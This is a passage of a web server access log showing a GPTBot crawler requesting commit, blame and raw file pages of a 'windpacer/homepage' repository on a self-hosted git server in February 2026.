"/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx" [Client 74.7.227.38] [Length 9834] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx" -[17/Feb/2026:13:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx" [Client 74.7.227.38] [Length 10795] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx" -[17/Feb/2026:13:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx" -[17/Feb/2026:13:01:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js" [Client 74.7.227.38] [Length 10496] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js" -[17/Feb/2026:13:01:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore" [Client 74.7.227.38] [Length 11423] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" -[17/Feb/2026:13:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts" [Client 74.7.227.38] [Length 9859] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts" -[17/Feb/2026:13:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts" -[17/Feb/2026:13:01:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts" [Client 74.7.227.38] [Length 10778] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts" -[17/Feb/2026:13:01:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts" -[17/Feb/2026:13:01:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts" -[17/Feb/2026:13:01:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js" [Client 74.7.227.38] [Length 10119] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets" -[17/Feb/2026:13:01:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" -[17/Feb/2026:13:01:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" [Client 74.7.227.38] [Length 10408] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets" -[17/Feb/2026:13:01:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" [Client 74.7.227.38] [Length 11209] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" -[17/Feb/2026:13:01:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images" [Client 74.7.227.38] [Length 10138] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets" -[17/Feb/2026:13:01:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore" [Client 74.7.227.38] [Length 9831] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore" -[17/Feb/2026:13:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore" [Client 74.7.227.38] [Length 10699] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore" -[17/Feb/2026:13:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore" -[17/Feb/2026:13:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts" [Client 74.7.227.38] [Length 11858] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" -[17/Feb/2026:13:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" -[17/Feb/2026:13:01:58 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js" [Client 74.7.227.38] [Length 10920] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js" -[17/Feb/2026:13:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm" [Client 74.7.227.38] [Length 10165] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" -[17/Feb/2026:13:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" [Client 74.7.227.38] [Length 10100] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" -[17/Feb/2026:13:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm" [Client 74.7.227.38] [Length 10086] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" -[17/Feb/2026:13:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images" [Client 74.7.227.38] [Length 9841] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images" -[17/Feb/2026:13:02:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm" [Client 74.7.227.38] [Length 10160] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" -[17/Feb/2026:13:02:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js" [Client 74.7.227.38] [Length 9951] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets" -[17/Feb/2026:13:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" [Client 74.7.227.38] [Length 10144] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" -[17/Feb/2026:13:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts" [Client 74.7.227.38] [Length 11177] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts" -[17/Feb/2026:13:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts" -[17/Feb/2026:13:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images" [Client 74.7.227.38] [Length 10172] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets" -[17/Feb/2026:13:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx" [Client 74.7.227.38] [Length 11609] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" -[17/Feb/2026:13:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js" [Client 74.7.227.38] [Length 10088] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets" -[17/Feb/2026:13:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts" [Client 74.7.227.38] [Length 11206] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts" -[17/Feb/2026:13:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js" [Client 74.7.227.38] [Length 10089] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets" -[17/Feb/2026:13:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html" [Client 74.7.227.38] [Length 11277] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" -[17/Feb/2026:13:02:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm" [Client 74.7.227.38] [Length 10246] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm" -[17/Feb/2026:13:02:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js" [Client 74.7.227.38] [Length 10305] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js" -[17/Feb/2026:13:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js" [Client 74.7.227.38] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets" -[17/Feb/2026:13:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data" [Client 74.7.227.38] [Length 10763] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" -[17/Feb/2026:13:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" [Client 74.7.227.38] [Length 11058] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets" -[17/Feb/2026:13:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images" -[17/Feb/2026:13:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx" [Client 74.7.227.38] [Length 9856] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx" -[17/Feb/2026:13:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx" [Client 74.7.227.38] [Length 10825] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx" -[17/Feb/2026:13:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx" -[17/Feb/2026:13:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js" [Client 74.7.227.38] [Length 11028] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js" -[17/Feb/2026:13:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts" [Client 74.7.227.38] [Length 11450] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" -[17/Feb/2026:13:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images" [Client 74.7.227.38] [Length 10171] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets" -[17/Feb/2026:13:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" [Client 74.7.227.38] [Length 14696] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js" [Client 74.7.227.38] [Length 9836] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js" -[17/Feb/2026:13:02:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data" [Client 74.7.227.38] [Length 10260] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data" -[17/Feb/2026:13:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" [Client 74.7.227.38] [Length 10260] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" -[17/Feb/2026:13:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts" [Client 74.7.227.38] [Length 9847] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts" -[17/Feb/2026:13:02:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images" [Client 74.7.227.38] [Length 10167] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets" -[17/Feb/2026:13:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426" [Client 74.7.227.38] [Length 18414] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" -[17/Feb/2026:13:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js" [Client 74.7.227.38] [Length 10015] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets" -[17/Feb/2026:13:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data" [Client 